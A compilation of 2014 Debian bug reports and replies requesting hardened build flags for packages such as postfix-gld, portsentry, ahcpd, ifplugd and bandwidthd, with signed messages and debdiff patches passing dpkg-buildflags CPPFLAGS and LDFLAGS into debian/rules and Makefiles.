Package: multitail Version: 6.2.1-1 Severity: important User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please enable hardening build flags on your package; adding: DPKG_EXPORT_BUILDFLAGS = 1 include /usr/share/dpkg/buildflags.mk In debian/rules is sufficient in the actual package state, or will be automatic if you switch to debhelper version = 9. I've made some tests after building multitail with hardened flags and encounter no problem at this time. More information available about hardening flags: https://wiki.debian.org/ReleaseGoals/SecurityHardeningBuildFlags -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJULGMQAAoJEJmGUYuaqqClrVoP/i4vVIgQ94Fr2TqavsU/B3RX fdiW7YCYxhF6JaYs3+9wXBk40zIzsym7aHsfTgDZI9lqtqWdGnqDz1UONaLiD0Fy VHvI0r+kSTWZtCsDwmPxhbHgfGV5JW/a/75PcN73A03aTcRhuXHSz5ECe8EIDKam /WXEHbu5BFg5F8wYJpxE16pCCfOf6DQF3vAjwNbF8n9Urx9HaJ1gLI+Sb6TdUEED Kp7a1XUAypiQ9CfIYiaf29GHeze6a1yr4Wjk2xzObMM0jWses3voPdHd7EN+u2p9 Ljom1NKzM7bWeN2KpskIWuWU72t4iKB8VGwChToYQC25vxM2iMIHfVAtWTeAeB19 kSU5gjv8X9hlGF5XE9732LiXP6Q2LtlmcwhQUn0yuN04NyN6aw+YugBzgyRijHVu ddgKRjyiDYg+OCu1IqHQwgfvo8eWhqdSvi/90RtaTJ397eQorgISH1wdSKUYGv6R C0gO4YiuyFEWwgRCCncbN9tUy23nDSteUUS2gg4mFfH60vPvgNEXp6vkaalwvG6/ VjA4nucLF/AA5oY57SN+5ZaEldlDARuDJnTSDFS7b1dHKLxQoNgYNk4M4AcM9eUO PwBVW0HsYpmOov1CcDxMa+OfX8rb5eDbK/3rHS8VrF9/Y9IFzZcNHow/XPVK1Ysv rfU1KX6/286nOUsFdoCW =jxnP -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#763154: Hardening options incomplete: missings CPPFLAGS and LDFLAGS
Package: postfix-gld Version: 1.7-5 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, As you previously enable CFLAGS, i've just refreshed your patch debian/patches/01 to pass {CPP,LD}FLAGS to make in debian/rules and updated upstream Makefile.in to use it. I don't use postfix-gld so it maybe needs more intensive tests than i've made. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUJ9RMAAoJEJmGUYuaqqCli5MP/jYxSewDmzTb16KE1E8DMlaU yr64sJbjBP8nJ2ub3Kj0f96n1rOQKu/5OvKQk6Fi62DrKypNDRzBObvq6iqyt+RA xg8bcd62hWSeFwDkt5VHNWxqGyMXQ7ECfiR8X4XrlHWnqL+1iY18WfbpFce4ZPxP jfZI62AsDaHQSYd0xZ/KuIwkgsBrtvhh7z4cEfINKSR1wT/0cAQjjvu1kLMZod2P xRcbkiPhmkZjAWiX8lnLqqRk1cTRuQHIxZVdj15RXC5Wyml2W4kC9XgyIa6K/qfF 81/mABKeiISNV+xlY0VJe/ztv0HCiOepdfHhvrCZ/tOT/6hu2rPlKHf1MD1OM0yy LtlkUOa0GEFNQJhtt225NVzPbARHBLCmgY2rT3ptY9yF0UbIlfxTujUwbmv0bmfD loA4wHWmCG5GlURDdGQX6WLmyRngN26YgRdRYccRB7anpSYfxjyr0m/xyARO4KPU 0XJQbSbMvlhSJI0hFEJZ/RGYV5hMWcYs2WIwUbdytoiZZrJRu6obrbgc4gTfkEO/ Y9fPF2kqHqze+LO9sv14jjOeqSsQ7V8I4Toelln6czZ80oI8SIe+rz6y90B8hMZ8 ug4E5AEzQXrt1R4OyAnNaBYpt4o0OVwbSkMG9KuMlzTy/ZNnDqQKfVSzFaVENuIw 3ddbI+nFf1dlrAIq88Sa =YEgw -END PGP SIGNATURE- diff -Nru postfix-gld-1.7/debian/changelog postfix-gld-1.7/debian/changelog --- postfix-gld-1.7/debian/changelog 2014-03-16 16:53:11.0 +0100 +++ postfix-gld-1.7/debian/changelog 2014-09-28 11:13:08.0 +0200 @@ -1,3 +1,10 @@ +postfix-gld (1.7-5.1) unstable; urgency=medium + + * Non-maintainer upload. + * Refresh debian/patches/01 to pass CPPFLAGS and LDFLAGS to gcc calls + + -- Guillaume Delacour g...@iroqwa.org Sun, 28 Sep 2014 11:06:30 +0200 + postfix-gld (1.7-5) unstable; urgency=medium * Fixed typo in README.Debian. diff -Nru postfix-gld-1.7/debian/patches/01 postfix-gld-1.7/debian/patches/01 --- postfix-gld-1.7/debian/patches/01 2010-04-19 00:09:12.0 +0200 +++ postfix-gld-1.7/debian/patches/01 2014-09-28 11:12:46.0 +0200 @@ -1,8 +1,11 @@ From: Santiago Vila sanv...@debian.org Subject: Changed Makefile.in to support DEB_BUILD_OPTIONS +Last-Update: 2014-09-28 a/Makefile.in -+++ b/Makefile.in +Index: postfix-gld-1.7/Makefile.in +=== +--- postfix-gld-1.7.orig/Makefile.in postfix-gld-1.7/Makefile.in @@ -1,23 +1,24 @@ all: gld @@ -11,27 +14,27 @@ gld: cnf.o server.o sql.o sockets.o greylist.o gld.h - @CC@ -O2 @DEFS@ -Wall server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld - strip gld -+ @CC@ $(CFLAGS) @DEFS@ server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld ++ @CC@ $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) @DEFS@ server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld sockets.o: sockets.c sockets.h - @CC@ -O2 @DEFS@ -Wall -c sockets.c -+ @CC@ $(CFLAGS) @DEFS@ -c sockets.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c sockets.c cnf.o: cnf.c gld.h - @CC@ -O2 @DEFS@ -Wall -c cnf.c -+ @CC@ $(CFLAGS) @DEFS@ -c cnf.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c cnf.c greylist.o: greylist.c gld.h - @CC@ -O2 @DEFS@ -Wall -c greylist.c -+ @CC@ $(CFLAGS) @DEFS@ -c greylist.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c greylist.c server.o: server.c gld.h - @CC@ -O2 @DEFS@ -Wall -c server.c -+ @CC@ $(CFLAGS) @DEFS@ -c server.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c server.c sql.o: sql.c - @CC@ -O2 @DEFS@ @SQL_CFLAGS@ -Wall -c sql.c -+ @CC@ $(CFLAGS) @DEFS@ @SQL_CFLAGS@ -c sql.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ @SQL_CFLAGS@ -c sql.c clean: rm -f gld *.o diff -Nru postfix-gld-1.7/debian/rules postfix-gld-1.7/debian/rules --- postfix-gld-1.7/debian/rules 2014-03-15 12:00:00.0 +0100 +++ postfix-gld-1.7/debian/rules 2014-09-28 11:15:49.0 +0200 @@ -16,7 +16,7 @@ build: ./configure --prefix=/usr --with-$(DATABASE) - $(MAKE) CFLAGS=$(CFLAGS) + $(MAKE) CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) touch build clean:
Bug#763158: Hardening options incomplete: missings CPPFLAGS and LDFLAGS
Package: portsentry Version: 1.2-13 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please enable CPPFLAGS and LDFLAGS from dpkg-buildflags (patch attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUJ9jxAAoJEJmGUYuaqqClS5EP/3hTMdQakfzqXyjLlUMPOOSh 4hJ3McD9eJT7YMAPIdOfpCzmSuA6kMqYWNPkx2BTk2MAjoG6DGyGwliaTK6cS5aK YEkm5mts4xYbBknOf6MS3nF4c4IVsic2JJiGX6NvbxjnVSm8g0HmRoh3oQHUKP03 Fj7keB4ko8yL1ZFomlZzF3R3aAbyV0BcX9k8mRvB9nMXdNp3EhQtiR43lOGi5Z6+ Et5DRB3MCURnEueS3+wg2jWBVweM/mF6BKas31y4EA9OORr0fJYPx1o8eDr9HNHZ LLl1g0+AS/uPQI/EVIpueh8QLBUctMXwQXTkbS9nG/rz4abZrR6S5RekSlMYumrk B60SqyHcLoyvM/g/xbrvmPaBOglyMkn/x/nPKF1Qe+JXKiHo3+dj1tt/JkAJ/Yoi 1dGZdsOzq9CCTnxh575kxgfcj08LDGia+ZgoB+bhNyXgdmaTS/SzNTU+KlOPN4pO tpW7i1+UTBoZTQLnjX1HvGwnYZdg//7biXzkGLyC5D+KIHpTbjLhaPGiOczK1gXW NNdOf+ZO9uQ/ZDgkXnOTAa740W6dfjbwC9CJ1jqpox8QJVdmV4tmCCucOVfeoVBW AnzkMgViarPSD5rxqkT/XM/FGbBM8hFToq95DXWoKkEwiLdNpIQ/HqfWwUpa81CG ykgGV3UAh/vSiIUSvFRW =Pidp -END PGP SIGNATURE- diff -Nru portsentry-1.2/debian/changelog portsentry-1.2/debian/changelog --- portsentry-1.2/debian/changelog 2012-01-14 15:28:24.0 +0100 +++ portsentry-1.2/debian/changelog 2014-09-28 11:34:24.0 +0200 @@ -1,3 +1,11 @@ +portsentry (1.2-13.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass {CPP,LD}FLAGS to make and patch upstream +Makefile to use them + + -- Guillaume Delacour g...@iroqwa.org Sun, 28 Sep 2014 11:29:22 +0200 + portsentry (1.2-13) unstable; urgency=low * Switch to dpkg-source 3.0 (quilt) format diff -Nru portsentry-1.2/debian/patches/01_dpkg-buildflags.patch portsentry-1.2/debian/patches/01_dpkg-buildflags.patch --- portsentry-1.2/debian/patches/01_dpkg-buildflags.patch 1970-01-01 01:00:00.0 +0100 +++ portsentry-1.2/debian/patches/01_dpkg-buildflags.patch 2014-09-28 11:40:10.0 +0200 @@ -0,0 +1,17 @@ +Author: Guillaume Delacour g...@iroqwa.org +Description: Patch upstream Makefile to use {CPP,LD}FLAGS +Last-Update: 2014-09-28 + +Index: portsentry-1.2/Makefile +=== +--- portsentry-1.2.orig/Makefile portsentry-1.2/Makefile +@@ -107,7 +107,7 @@ linux: + debian-linux: + SYSTYPE=debian-linux + @echo Making $(SYSTYPE) +- $(CC) $(CFLAGS) -DLINUX -DDEBIAN -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \ ++ $(CC) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -DLINUX -DDEBIAN -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \ + ./portsentry_io.c ./portsentry_util.c $(LIBS) + + diff -Nru portsentry-1.2/debian/patches/series portsentry-1.2/debian/patches/series --- portsentry-1.2/debian/patches/series 2012-01-14 15:27:18.0 +0100 +++ portsentry-1.2/debian/patches/series 2014-09-28 11:33:41.0 +0200 @@ -2,3 +2,4 @@ 00_fix_portsentry.c.patch 00_fix_README.install.patch 00_fix_Makefile.patch +01_dpkg-buildflags.patch diff -Nru portsentry-1.2/debian/rules portsentry-1.2/debian/rules --- portsentry-1.2/debian/rules 2012-01-14 15:27:18.0 +0100 +++ portsentry-1.2/debian/rules 2014-09-28 11:41:07.0 +0200 @@ -9,6 +9,9 @@ # Uncomment this to turn on verbose mode. export DH_VERBOSE=1 +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk + DEST=`pwd`/debian/`dh_listpackages` ETCDIR=$(DEST)/etc/portsentry PPP=$(DEST)/etc/ppp @@ -17,13 +20,8 @@ INSTALL=install INSTALL_PROGRAM = $(INSTALL) -p -o root -g root -m 755 -CFLAGS=-Wall -g +CFLAGS+=-Wall -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) -CFLAGS += -O0 -else -CFLAGS += -O2 -endif ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS))) INSTALL_PROGRAM += -s endif @@ -42,7 +40,7 @@ dh_testdir # Add here commands to compile the package. - $(MAKE) CFLAGS=$(CFLAGS) -f Makefile debian-linux + $(MAKE) CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) -f Makefile debian-linux touch build-stamp
Bug#763180: Hardening options incomplete: missing CFLAGS
Package: ahcpd Version: 0.53-2 Severity: normal Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, The upstream Makefile overwrite CFLAGS variable exported by dpkg-buildflags (which is -g -O2 -fstack-protector-strong -Wformat - -Werror=format-security). Please find attached a patch that fix that. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUKAnCAAoJEJmGUYuaqqClbacP/2XWXL2wNUs8YSjakrORi9Vx AZ4ChszXdK8bcAMrEv3E/AdKBmz4PlpPBNEeZkUvkPV3eO4Jst/YnxJEXbpJ7GnW aaEFbZXGlORNkoTJxjBOKEjwxz1hELZ23vJGADBSdnkp4u2xoYtkyLrflwflTnMY Cb2F1AM20HuTG6WYAVtgpRuzzVVPEgSwJGyzZREOeMx/wZJ+qeiZSqHaPhQ3SuGo xGou0cWDgKdooem0ueWs4Q/ybk8q00dCqkj6TD86anUIqtiiLUiM+RRPNyIQwjM1 DL8ZCaNk4mbdcwHM0oWsPOdtUDH6kZoXdpBWHHN8zDqT7vrX7SoAilk8e5myz78M 21q0jJwd8iOx1S8t94jsdjvYbv8ZLovVKRn5r46+LGuDQ6gToMVv3qzmIExq2liD 9J3Kv6j2FSTROuZFck+PA5Fhyg3RhxA8LfiWLHHSKtRh3VEb56zolvbF0ji+Jsoa 4/w/4I+PsqpDCT6EgTtwro/J3DZW53AFj5WOoTNnye430is3ihtESdWLeavL+HSx Foj2H82+yEK5j21NqJS8PUuPB0pKfOt8PgbHUYYZx1qmGkz4nGL+RyK4D1OOM3kx nZHEJK+KhCmfvg0/zOEjCLjVuxMAgflYWAAlVA5Di92dXDIVAeiyPCRG+vHtbzFL a2SM1L5B0ErJbTjTtvEv =5do+ -END PGP SIGNATURE- diff -Nru ahcpd-0.53/debian/changelog ahcpd-0.53/debian/changelog --- ahcpd-0.53/debian/changelog 2013-05-26 21:11:53.0 +0200 +++ ahcpd-0.53/debian/changelog 2014-09-28 15:08:19.0 +0200 @@ -1,3 +1,10 @@ +ahcpd (0.53-2.1) unstable; urgency=medium + + * Non-maintainer upload. + * Patch upstream Makefile to not overwrite dpkg-buildflags CFLAGS + + -- Guillaume Delacour g...@iroqwa.org Sun, 28 Sep 2014 15:02:21 +0200 + ahcpd (0.53-2) unstable; urgency=low * Add logrotate support diff -Nru ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff --- ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff 1970-01-01 01:00:00.0 +0100 +++ ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff 2014-09-28 15:05:30.0 +0200 @@ -0,0 +1,17 @@ +Author Guillaume Delacour g...@iroqwa.org +Description: Don't overwrite dpkg-buildflags CFLAGS +Last-Update: 2014-09-28 + +Index: ahcpd-0.53/Makefile +=== +--- ahcpd-0.53.orig/Makefile ahcpd-0.53/Makefile +@@ -4,7 +4,7 @@ CDEBUGFLAGS = -Os -g -Wall + + DEFINES = $(PLATFORM_DEFINES) + +-CFLAGS = $(CDEBUGFLAGS) $(DEFINES) $(EXTRA_DEFINES) ++CFLAGS += $(CDEBUGFLAGS) $(DEFINES) $(EXTRA_DEFINES) + + SRCS = ahcpd.c monotonic.c transport.c prefix.c configure.c config.c lease.c + diff -Nru ahcpd-0.53/debian/patches/series ahcpd-0.53/debian/patches/series --- ahcpd-0.53/debian/patches/series 1970-01-01 01:00:00.0 +0100 +++ ahcpd-0.53/debian/patches/series 2014-09-28 15:06:39.0 +0200 @@ -0,0 +1 @@ +01_dont_overwrite_cflags.diff
Bug#763183: Please enable hardened build flags
Package: arp-scan Version: 1.8.1-2 Severity: normal Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Upstream already compile arp-scan with -fstack-protector,- D_FORTIFY_SOURCE=2 and -Wformat -Wformat-security gcc flags (but LDFLAGS relro is missing); the use of dpkg-buildflags is recommended as it export all Debian hardening *FLAGS automatically. You can just use it at the top of debian/rules: DPKG_EXPORT_BUILDFLAGS = 1 include /usr/share/dpkg/buildflags.mk Or switch to debhelper 9 to automatic enable this. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#763184: FTBFS with -Werror=format-security
Source: cfengine3 Version: 3.2.4-2+nmu1 Severity: important User: debian...@lists.debian.org Usertags: hardening-format-security hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Cfengine fail to build with dpkg-buildflags hardened flags, particularily with -Werror=format-security CFLAGS (build log attached). The buildflags was not used in your package, i've just adding this to debian/rules to see the failure: DPKG_EXPORT_BUILDFLAGS = 1 include /usr/share/dpkg/buildflags.mk -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUKBKhAAoJEJmGUYuaqqCl6NsP/0cEdSHRoBdy3rxelo8rybOU GCyu+ncbu3EmD06Vgr17iWeQIadvuT0rqsbWWfYxom1OmNjCs5S3Zj2WoMhZfa0E WL3wsxFV+nFWWiM2a16ftwaoO7V4nskXMkgNhnFDC5FprO1XFvaWSgYSMOLK0XBt xcnlXJTlUXcizEAi8Alz51Lal1oF9QZ5bl4j67e2a5iP3rZ/JL5daIt9Hz63rLsY +A+VQLzE1MrvzEsN6gmW/evCfI/gQXCLs9p3Vy+HeE4Ahsr8VNszShQFaLE2Kb6I 4jj3aVneqtJ2ZixoVttEY3+2gd0Z+VG65TrDAAyBMnXycbXOb7GLYuRA3DzQj1na McA2/zZeYwZdCVONNjJ3U9KiWAyMLywO4v1OZSm4J3gDfig4wmBK8JLO9rcouMYA pBlt++BLkUVS7jECfX200AczqmyLUTolQqINcjAJ1iQVT7gccXufTDldgk7Jhuvd 46Ud+iYNZZrcWGqCFTLwPwreyYOSjpfZ0jM5Z95XoKOFobSvF2V1RPlDHbYzHXtH AJU6lZrSH56hfKqPoLpG2YuRe9pHgAG/y7RXrS5SuyhEZZAvaekxDyjsBKiX4vUL lDHaThxYPNJYGfsskzSnBFVJVoDSTsy2VD+ealW3r6moV9REpj0L0g3eCobO5mC9 0BsDuNBopnnq4u/v4GMA =tgiA -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#733588: memcached: Please update to new upstream version (1.4.20)
Unless David emits objections, i've packaged [1] the new upstream and fix all bugs in the PTS (and also fix build for arm64 port); i've had to use debhelper 9 and dh_autoreconf to easily build this version without repacking it and provide systemd script. I've also fill the git collab-maint repository an alioth [2] (which was created empty on january this year) with actual version on sid and the version 1.4.20 and my debian related changes. [1]: http://mentors.debian.net/debian/pool/main/m/memcached/memcached_1.4.20-0.1.dsc [2]: http://anonscm.debian.org/cgit/collab-maint/memcached.git/ -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#733588: memcached: Please update to new upstream version (1.4.17)
Hi, As new upstream release 1.4.20 available, i've proposed my help to David to provide a new upstream release and try to fix as many as possible BTS bugs. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#543626: memcached.log show event_add messages
Hello, This is apparently fixed since upstream release 1.4.6 (fix race crash for accepting new connections). Sorry for the late answer. -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#762331: Hardening options incomplete (CPPFLAGS, LDFLAGS)
Package: ifplugd Version: 0.28-19 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please enable CPPFLAGS and LDFLAGS from dpkg-buildflags (patch attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUHotAAAoJEJmGUYuaqqClMqsP/18Wlil2RQmuffUGNh8onHno Yb5y30UbZzco94KbhhrahfOT5FZ/fsQaX7GUkED68rf8WJOiFMH9kcTEP0k1d4o7 MJmrNzbiEIgOqFLKWX2pP/KnNsWh1SIj4FL04ELCh8bfwAoP+pEmmx6uxrIT2NUc 6PU/MdQIGQNA/FB+n5fGwD0wwjxeiQRAja7lmzP+Oqu9PLp3K4kByDFJOSLsnYJq GdjkuAc8oh2O+gsE0sttxiGqpgJbrq9YB22XMEPlgbm4cvrmfb0SguXfYcN20WzC 0v/BrGRSzZkJlCat9qqSbaGOx8WpdU/9eeXLiLjPeCn3jwgSnAIwgKOXJZAj0HNk nARIM9pqbsYBDAKDWjXfIka5iKIguLVhk7jktg75GiWU4ClcGE9VwyYqmMcQTeHp NjIKriPuPy1MXfiCNVZMqOhQMhcKuYROTBvsknL8TSARuzCQhCUbngEkaDaowFT2 VFyB5GM2D5cLR6U/e8Yg6qyvIudvgTllm/BPI7XDKJ3r0u7uI768svJFB+aMPiJg 04t3BZzoeCCODtx/obE9nHuzHJDfp5gos+PAplUP0xqdksdt3Fd4hIUmaTYYSqaG HfM8NXM7YUHIbapbZOFdQ7qGrbKwzNTB921R8/srYlVmOAXr58Z/l1HuCvmTm0Pp G491jTPJwrRwGG5DwJI8 =R9QO -END PGP SIGNATURE- diff -u ifplugd-0.28/debian/changelog ifplugd-0.28/debian/changelog --- ifplugd-0.28/debian/changelog +++ ifplugd-0.28/debian/changelog @@ -1,3 +1,10 @@ +ifplugd (0.28-19.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass *FLAGS to configure + + -- Guillaume Delacour g...@iroqwa.org Sun, 21 Sep 2014 10:09:39 +0200 + ifplugd (0.28-19) unstable; urgency=low * Added interface poll delay 1sec using the new -T option. (Closes: diff -u ifplugd-0.28/debian/rules ifplugd-0.28/debian/rules --- ifplugd-0.28/debian/rules +++ ifplugd-0.28/debian/rules @@ -4,19 +4,14 @@ #export DH_VERBOSE=1 include /usr/share/dpatch/dpatch.make +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) DEB_HOST_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE) DEB_BUILD_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE) -CFLAGS = -Wall -g - -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS += -O0 -else - CFLAGS += -O2 -endif ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS))) INSTALL_PROGRAM += -s endif @@ -36,7 +31,7 @@ cp -f /usr/share/misc/config.guess config.guess endif [ ! -f doc/README.html ] || mv -f doc/README.html doc/README.html.ups - ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --sysconfdir=/etc CFLAGS=$(CFLAGS) LDFLAGS=-Wl,-z,defs $(confopts) + ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --sysconfdir=/etc CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) -Wl,-z,defs $(confopts) touch $@ build: build-stamp
Bug#762336: Please enable hardened build flags
Source: bandwidthd Version: 2.0.1+cvs20090917-7 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please enable hardened build flags with dpkg-buildflags (patch attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUHpHRAAoJEJmGUYuaqqClNhQP/jYNArIMFtGuoXbnZ5dS54p+ WjybNeG948asYMeLoDT86QRYl/RYiprPqXy1dNf5/zV8qoTX5i+S39X49sKbfRQE HIEzsJOqp/+PPKK0fBZ7Yf+ScTiQMiJAnvaxTtfy6kiP++OLXl/J+Zzw0AsusEwH wGe9i+zMFuH0yEB5qr9Pst2foiPmXmK+gE7mtEe4AGdTPKRFcg9JW5TZsL8b5MFC 6PxA5LnOP2MyAoxpDJKiAFS775/fihBY2ppUz86oEh1JnjX9WFsdy5QrWqoo8LfG trc9eUSIysksjSL79akyUikia6AOQr0NxxO6LDdQIjMXVgin4BcfW9pi/g5a9A4g XU4Na6H9viLfs/y5bnfHnhl5uhygy3OVWpgh+1KvdwCzWA2PBnu0zjJ+zAo8bdSb +rg5LK4KsxrLlHEsVrBud6pigLuEPxfEIXrlqlEcSwOtkCJF2E7OiaUtCZ/Ry6jI tNVFqp21C3q6ppP31QF4VJFGga4OoLdw5cQhpfA8ARiwewrcurxy3qan3Ge8khVe SMyzaKEipSehDxyySKL/5zgiXyOWTDro5Sbal+GI3LHApxMD4TlQv8YEMpKF3OuX ccQ9khGMrdD+PRJGjEmYJKVByPK+pokcTrkk9YIQLBwuy/YIuW9obLjXWV+KMGEA azkJz++xs3S+l314ZhUP =Prxd -END PGP SIGNATURE- diff -Nru bandwidthd-2.0.1+cvs20090917/debian/changelog bandwidthd-2.0.1+cvs20090917/debian/changelog --- bandwidthd-2.0.1+cvs20090917/debian/changelog 2013-07-20 18:25:40.0 +0200 +++ bandwidthd-2.0.1+cvs20090917/debian/changelog 2014-09-21 10:39:48.0 +0200 @@ -1,3 +1,10 @@ +bandwidthd (2.0.1+cvs20090917-7.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass *FLAGS to configure + + -- Guillaume Delacour g...@iroqwa.org Sun, 21 Sep 2014 10:27:23 +0200 + bandwidthd (2.0.1+cvs20090917-7) unstable; urgency=low * Move php5-gd to Recommends and also recommend php5 (Closes: #717042) diff -Nru bandwidthd-2.0.1+cvs20090917/debian/rules bandwidthd-2.0.1+cvs20090917/debian/rules --- bandwidthd-2.0.1+cvs20090917/debian/rules 2013-06-14 00:41:25.0 +0200 +++ bandwidthd-2.0.1+cvs20090917/debian/rules 2014-09-21 10:28:19.0 +0200 @@ -6,6 +6,9 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk + configureoptions = --prefix=/usr --bindir=/usr/sbin/ --sysconfdir=/etc/bandwidthd/ --localstatedir=/var/lib/ p_bwdstatic = bandwidthd @@ -15,17 +18,6 @@ build_bwdpgsql = debian/bandwidthd-pgsql -CFLAGS = -Wall - -ifneq (,$(findstring debug,$(DEB_BUILD_OPTIONS))) - CFLAGS += -g -endif - -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS += -O0 -else - CFLAGS += -O2 -endif ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS))) INSTALL_PROGRAM += -s endif @@ -41,7 +33,7 @@ cp -f /usr/share/misc/config.sub config.sub dh_autoreconf chmod +x configure - ./configure $(configureoptions) --disable-pgsql + $(shell dpkg-buildflags --export=cmdline) ./configure $(configureoptions) --disable-pgsql touch $@ configure-bwdpgsql: configure-bwdpgsql-stamp
Bug#762336: Please enable hardened build flags
Le dimanche 21 septembre 2014 à 16:11 +0200, Andreas Henriksson a écrit : Hello Guillaume Delacour! Thanks for your patch. Have you tested it? Are you sure it doesn't break things? Too many times have I been asked to enable hardening build and then again having to re-disable it again because the submitter didn't test things at all and when problems showed up the submitter went into hiding I don't use bandwidthd personally, so i've just installed the generated deb with hardened flags, started the daemon, let the default configuration and wait a few minutes to see a first graph with a values. It maybe need a more long test campain to be sure everything is ok (my desktop only have one eth0 interface). I didn't see any similar issue reported before for bandwidthd (and the fix is simple to implement), this is why i've opened this bug. Regards, Andreas Henriksson -- Guillaume Delacour g...@iroqwa.org signature.asc Description: This is a digitally signed message part
Bug#761123: Please enable hardened build flags
Source: irssi Version: 0.8.16 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello, Please enable hardened build flags with dpkg-buildflags (patch attached). dpkg-buildflags handle noopt from DEB_BUILD_OPTIONS. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCAAGBQJUELfFAAoJEJmGUYuaqqClxlUP/AhJ2TmioMRwSpWIhDw6VnVE pl5UTTj/ADAdophobeUrUjpUStakl6f5pDOHa9xJV/t5RQ3F91be46lFGfTOF3FL 8sVibOSVdbjsz8fq7oPn48dlJz2JV3L5lne3+nHm8vt2fw/BMbvRymLISIo1zPky F/ui6WGsi0d1VzaO/zIG7UWbXAduNZSRUfItLxIrxRXrgG2RohQP9pP8zPG6GXWw QWV3NBMLUmMPBSJdI6/GcEuJw9fxigmB1Jey4uuFJ+AM/VSk7gSC+cAIWyQeeuJG FYoSNNu21qnfuFi5hamr/mlTDtKRr0T1NO3hwNTz6lKNXs/hIlatbJlFmWL0FvCp 